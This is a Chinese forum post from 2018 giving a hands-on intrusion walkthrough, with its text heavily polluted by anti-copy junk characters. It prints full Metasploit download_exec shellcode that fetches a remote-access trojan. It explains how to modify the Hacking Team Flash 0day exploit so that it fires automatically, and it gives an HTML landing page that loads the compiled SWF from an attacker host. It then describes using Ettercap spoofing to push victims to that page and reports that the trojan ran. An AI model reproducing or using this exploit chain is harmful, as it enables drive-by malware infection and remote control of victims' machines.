|
/ @2 h! B) X& x: [7 ~9 \/ G 三、flash 0day之手工代码修改制作下载者实例入侵演示 9 d }0 a) l a% L w
/ \% L) F6 Y m7 {+ D1 [6 K3 [ O
利用到的工具:
" N( ]9 A" d. `' y" _5 L
4 V8 L" F- I! O/ H5 } r6 O. X9 D/ m0 E2 r1 Y" Q7 x' I, o. b
Msf & @$ j) Y' O' W+ o! R3 H
_; I# k9 [. F) V- N7 Y6 j2 v3 p3 e* E" x$ A+ P
Ettercap
: ]4 d# C, ~6 X% c
7 y2 {% S8 ^0 U
. L) ?' F) d( B: H% k, X) Q# ] Adobe Flash CS6
8 I+ D/ n# t/ D4 @ 5 a( P" ]5 J' Y% I
; e" v/ j3 Q9 _" u! L; L+ { Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
6 r- q( f, Z- |) x. g- Y ~ & x( g P( i( r( I) L
% ^2 A: @. H8 g5 t, T
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
5 z# P+ _5 Q" u9 T/ y8 h, l& a
: X' [6 E) n& o
8 {& u: A3 y! v" _5 S/ f 如图: : n1 A+ |) Z$ |/ { t& m
5 ]* |4 w# N# ~1 V5 o$ E- L, H! r* r) ~3 W/ Y% w
9 e0 |3 i5 J3 k9 R( U
, x8 b* J" z4 P4 C
3 y& E c, `# G6 ^" L8 O! _9 Q  6 e8 a9 g; W( H
, v$ `) d% T5 Z! x, z! v
% G$ R/ ~& D9 M& K- v* z, v6 M) Q
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
0 m# s, J0 W: Q2 L, t( l: K* E ) [/ c9 f1 T# X" m% q- |+ {
. @% Q6 T+ M6 `, i& D" I0 u
' Q) W/ i" r1 r; H7 p* H ) N! m' `+ S* X( U0 |% x/ i; i
& L5 T0 d1 E" S
 ) C. z3 @5 S/ _" w' \
7 @5 T9 p$ o/ ~8 _& w) [& H" m" @$ M7 v
然后执行generate -t dword生成shellcode,如下:
/ V9 j" h0 K4 y0 e , Z7 k. C V- P2 Z, K) |
/ n$ u6 |# y6 t) {3 {3 \
 9 L$ c$ Z/ I* h% }- P3 K
Y% b$ ^$ ?$ d t6 k a9 j6 r
0 j" L! i' |6 M9 c+ y" V |( g+ r
复制代码到文本下便于我们一会编辑flash exp,如下: % {* a7 q# D$ r8 k$ f
% E, G/ ?! C$ O4 X( k5 Y' M
. y3 P5 r9 g3 Y 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
& Q) o! \; [7 \8 P7 T4 T+ c ' Z! z: a' V3 E2 w
0 B: }: \. g) N, q( @7 V
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
+ C# Y9 }( u! J d) U, E! n
9 ?3 |' V! ?6 U0 l( ?. e2 j, W3 A; m
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, " ^6 I2 A. }- t
1 [- O# y: F4 G0 T& }
8 R/ ^+ J9 ]; ^9 ^5 x1 |/ N
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, $ L5 t" K) X9 A
7 S4 \- v1 j. n5 o; b, r
7 j( k, T; n3 ~+ E+ r 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ! V) B" Y+ M1 D
1 r4 Z! V6 W" h; T+ F# f6 @
+ r$ e" N0 l4 L, Z 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
3 s+ N4 ~9 e8 _0 O 5 N; g3 ]4 j x8 c; _1 Y
' Q {6 y/ N; R 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, + k4 q }! T9 g: ]
9 ~) b, E" a$ y3 v+ H" X; i1 c
+ \+ v) _/ C8 T' U 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
5 b/ Z m+ S6 P! n% M
s+ H6 N' l+ K$ Y2 D
7 m; P) ^7 a4 w4 A9 Z9 p; d# o. U 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
. f) b6 x4 e3 j1 U/ V
4 E$ @7 O1 F9 H$ s+ q# H
8 p7 D0 V# Q. y. N 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
, U+ f) @4 N1 G4 r & N6 A8 W( e% I2 K: R
, M' G) J+ x/ p% z0 @, ^ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 0 {# H: Q! u! ~7 K. E
7 A1 \- n+ j* _1 C9 J& U
9 k! ~) d& L: A3 h
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
; P' ?7 o# k& L5 t' A( Z ) ^# n1 J+ ]" b# e
+ t [- l# `" C/ P' s2 B+ z 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, : _# p! l) D' E, |: |7 e
% x3 L* K, G' d0 w( t- A8 d
* M* g4 {; Y; V0 ^3 a9 W
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
5 d5 F/ k, \. H3 [9 }6 Q
( P; \ ~: i% ]6 F8 g
$ }) G9 C5 v8 W, O; X" @: e 8 m5 v/ Q" ^& a
: t/ N: m- q; G8 N
( B% `- V# L1 k, R4 ]- R, y + {0 i5 j8 p$ o" d9 p# `6 T [% r
( N, y# X: G+ q( {
* g) |8 U3 l! `
下面我们来修改flash 0day exp,需要修改三个文件,分别为: . ?- t8 E. t) T3 U
5 Q: A5 y: v% i% H: C* U
2 ]. E( Q/ I% s3 K2 q 
* m4 J) o. I; z3 u7 }
/ S( f6 `4 e6 m4 @, G/ H$ r. L7 Y8 F( v& u$ w* R2 r
先修改ShellWin32.as,部分源代码如图: * ]/ k" E+ M y) ]* B: K
/ \" k @( Q2 @. G; u4 t2 p
/ l9 j8 f) [* O
7 z8 y1 Q5 F; O9 _9 Y$ v" b. B
: E1 [. z4 |0 a0 n
; ~- u! d5 H. ]2 Z# V+ z$ E! f& P8 d 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
/ ]/ l7 r, H$ K* r 0 |7 w- ]2 ]7 v# O$ C( N5 ` q
: T/ d# t6 ?* o 
+ k) e. t* Q3 h$ F& J* k6 B - \* c1 y& H$ G6 N, N( a! M. Z
& y; ~9 Q% B! ~6 H
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
. A1 \; ?1 p% P" \8 w
+ {# t% U1 m" }) P& U
# A8 x9 h+ \/ @; @/ S0 @ 
3 n9 R0 v3 E+ n( c. _ 1 p# t9 C2 y0 _
S, Y5 p/ K1 _
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
# d7 A( L' Z2 V
! B" F u( ?8 v! F1 ~% y* U% |, ~0 { Z J6 ~ ?
5 B. w( {5 ?4 v" G + ^" U( C& r' L* i
0 C+ Y% r5 ^; D0 n% U
; e2 o m' e: e" K( P
0 V5 ^# E: I, b! A0 |8 N' i! N
( A& t+ ]( d$ o1 ^$ y  4 A$ R9 B: ^3 z9 c; l2 G5 @6 ?3 {
0 g3 m! c' M) \' M
0 L, f1 H( ?0 u3 p D- a 然后点保存,下面我们来编译一下,打开
! e3 C! V3 I; g% p8 m" X% u
# Q" d; g9 {5 `1 u/ h* s3 N
( U/ N2 b! G' W6 q9 t) r exp1.fla然后点文件-发布,看看编译没错误 ; v$ [0 z/ d' f1 N
" t: v% A( u* Y6 M/ V; N1 ^! J7 Q a! t/ |
0 N4 H/ |- b6 R% |1 d9 b+ N& U/ x
) q$ K+ ^$ c) H! x3 R2 y# e0 F
: V$ T J% l1 n( X$ a }! c
0 u+ k- y. b' R" @: ~
4 S; e* z! S9 Z4 L- V; g' @% v
# D( z/ c5 z# v1 ]" u- |1 i( Q6 H" c
& V( v D2 V6 [' t$ Y
! U7 t# C8 X- ?0 ^8 ]! Q5 q4 j. ?# Y, Y% r8 J- \1 `3 v
! p3 ~% Z' F& c0 _ & ?4 [; o) E3 I j. `2 x9 M
, Y# ^ x. r% l5 d/ ~+ e( ~
然后我们把生成的 / N$ R" l4 C; {0 c: M: h/ W, r
$ l, {3 x) a2 x' d+ }$ q: g) p
( O3 V/ u4 {, Y1 d1 S) p
exp1.swf丢到kailinux 的/var/www/html下:
) O) n- U& j0 l2 J( p- T $ O0 B/ M4 K% @% J6 A. Y
$ l4 U2 d. z& T: j/ c 然后把这段代码好好编辑一下 6 G) ]. ^, H" J/ f/ K7 Z$ {
& L2 m$ ?% n# s1 x L9 d q, {
! m) `% J1 m* I' z+ M7 Q ' L- O G1 V) f a& \8 K7 L- u" x
) n- i2 \% W/ @0 e5 Y# Q4 k$ L B) C
, U: Z9 ?; E5 m, E; P" J1 a. \
: k6 |9 f9 W1 w4 o
) b: _# |# C% D3 P- F( l) Q ' ?" }" \; r [2 z. B0 i
- T$ ` v5 K r. `3 t) ]/ h
2 g, I4 q }: o+ O" F+ X
& C3 H1 S4 F# ^0 O P# Z % D0 U$ [% R3 n( W( a
+ j' A' |4 `6 A
$ u, }6 {( \0 l# K0 B+ c3 X8 r # H0 {- n- ]$ Z# X; m! c5 f7 ]
2 q( L- A: C8 w' q5 |3 w0 W* ^, Z- ~
0 `: N/ _7 ]& [ - I: @2 B9 S3 E
. \( m3 [; q; z8 f. @ <!DOCTYPE html> $ b& s5 H9 l6 W0 k7 m
; e; {$ y' }( h& W# j% l8 w$ d3 O/ k. T4 b. ]
<html> 8 A* d0 e9 p, Z- i. O% p* L4 r
1 Z: {) @% Q. \9 ]5 d$ C5 J
7 {! e9 O( `3 ?, x: F7 C* l! y9 w <head>
9 T* F3 E- v- r % x9 k. K! h8 f4 z* _% ^
& W8 K# X3 ^) ~" L; U5 c <meta http-equiv="Content-Type" content="text/html; 2 R F) T. Y$ {8 D$ A( F1 Y" |
& W& O* H' L) ~! |% H: }/ v# p$ [# J( c2 F: E
charset=utf-8"/>
( w8 t7 y& f( j9 k+ T 9 n+ P+ W3 \. r
& }0 f, v" T$ D5 G& l% C
</head>
8 F5 U0 r/ f: w. b2 j) v
9 ]1 T# I4 n, q6 U1 q" }( C. c. F# B
' \% m0 x- K2 ^, z z8 l& } <body>
) M: r0 H3 w& ]: }5 z8 p% N
! m8 |: L4 i" Y8 u* K
+ a; b; d( Y; f( ]+ a <h2> Please wait, the requested page is loading...</h2>
C" h6 H% B% X9 w* s" W8 G + z3 A7 x6 _- {( _5 @! H5 t! D
! N/ X" K( X# c! r <br> & m( ]! |3 ^1 x' U5 U! a8 B
: s4 i8 |, `) ?
6 z+ l: W; a6 k2 h+ w& a/ _6 y <OBJECT
; a) v: _- Z! w% B5 R `
, ]& `9 Q$ J/ U ~- h) E. K- h, Z5 ^$ r9 A) U" \9 H) z! ?
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie - a E/ ?) B/ ]9 O2 ?3 \
9 f- A" u% B j% i. x) b* b% D
+ c8 j" A+ D8 E5 s" ~+ H6 s- E2 W- a VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ) ]' n. v% E2 s( b2 i4 F
0 Y% ^# o# ], o3 a1 d& g; L3 B
9 X3 U4 c' O( v' u( e( b </body>
9 a% c- h2 k1 |! Z$ W+ e- ~ ( h: i. t" q4 N+ E- R- e
7 ^7 d/ a; q K" V( m# g! H( N3 s <script> 1 u* z* d; b6 u
/ V# K* i3 Q) ~7 O& n8 [ H% M) N5 n/ T7 v" k
setTimeout(function () { $ z- v+ r' i# ~- R# Y& v
" t; N4 K5 {6 h$ w' @& T
/ d; u4 B: A+ p# F4 t
( o1 M7 C% U2 r, ^+ t
& f% N% @) g$ f" {9 q
% f/ ?$ t5 n u9 o- B6 ^: ~ window.location.reload();
; w' i/ ^8 w V$ p. ~1 r 7 ^! u6 ?! F- V6 @
) [( T8 @0 q# D; Q$ A6 \8 I( P }, 10000);
! k) T% U9 v4 `6 g9 ?
6 j- x0 i) I6 X5 S0 t% s5 |
2 W5 \& x5 a6 k
. o, }; O3 a; s7 M
+ `8 h! K1 I" F
& R+ W+ z! E1 o% u </script> 6 }+ d, n$ m! u( m! g) O
5 L. y4 a% n4 V/ k8 f0 s$ I4 }2 a8 ^( w4 Z( c
</html>
}6 H/ i* z6 `3 U' v/ Q ( U8 S( S1 w: _! R* J9 p
. X& p! e o1 c) ?: ^9 ]( D 4 D; i# `" @4 K
/ q; Y0 f% K Z' I5 ?
7 d( u" G) p* _ 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ; ^/ {$ ]# e+ u9 ^/ }! z
8 I) T# N T/ u- R q
) e- \( `/ ~) [2 f- l1 k' o7 _ 
$ D8 s2 h* o* c3 C4 K9 g2 e
$ a7 v$ U; ?4 v9 z3 C1 @8 R
. _' L, L8 l) x
+ X" t) t) I" P% U3 X" B 5 z' Y4 E6 ?9 c1 J3 Z% ]2 i, t0 i
$ z2 R& D, Z, m
( M& A& r! I0 ?, F# m5 o ' A V6 ]" E' j$ p8 K! l
( O( c( q+ k5 O- E _. y# P0 h0 j
' s4 k) B( S4 x& l6 s
7 V: X8 y% O! X* A
2 w$ `1 ]/ r! `* P3 S3 [3 w 9 G: h" q' T9 A7 d
" }& i9 ^7 C& g3 x% Q
2 N2 @! O% `/ a' L' E 下面我们用ettercap欺骗如图: 5 A8 K; p6 e) C9 z. _
+ g4 e7 S( G B* x2 x
3 ?* e1 u: _& |
 , F1 r$ W, {9 a, s! P0 ^; g
! F+ l! B) N/ R7 j- l5 w3 L r/ k# ]8 u) }. s/ V" t, i# C0 s: q
- ~1 d$ U! a d* h( p3 D
# W. w% \/ m m+ _; K1 K
! A/ D+ R' [2 Q* T8 j 下面我们随便访问个网站看看:
2 C' ?2 Z3 w9 [ q: ^
' |5 a6 j* ~2 Q7 q+ t2 `6 m+ e. l- B2 M# D+ o. ~
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
- ]" j' e |& y: N, x- w8 i Q
. f* K* a1 j0 P- B. x, x8 L A6 O0 a! y$ [
- h8 n( k/ z! i- P! }
" x+ H9 z' y |0 t1 C3 k
" P4 O2 H3 ^4 a$ `* c 我们看另一台,
7 A1 N: Z4 S. I . G( X6 `! n4 ^( F+ K
1 T3 H' A8 {$ a' } t! h0 I" O
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 ' w% ^' U7 b: a- l0 ~0 ?
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对